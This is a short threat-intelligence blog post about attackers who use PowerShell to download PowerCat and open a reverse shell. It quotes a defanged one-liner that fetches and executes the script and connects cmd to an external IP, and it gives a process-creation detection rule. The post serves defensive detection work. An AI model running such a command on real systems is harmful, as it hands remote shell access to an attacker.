328. Adversaries Use PowerCat for Reverse Shells

Hello everyone!

I mentioned already that sometimes threat actors want to be caught. Let's look at another case and a tool I don't often see to be used ITW.

According to this report, the adversary leveraged PowerShell to download and execute PowerCat - an open-source PowerShell-based Netcat utility to start a reverse shell:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd

As you may have noticed, the adversary don't rename the tool. And in many cases it's a very common practice. The same can be said about the repository - threat actors often abuse PowerShell to download tools from official sources.

So, it's another notable thing to document and build your detections, for example:

event_type: "processcreatewin"

AND

cmdline: "powercat"

Don't forget about the script block - it also contains lots of interesting strings and functions, just check the script itself.

See you tomorrow!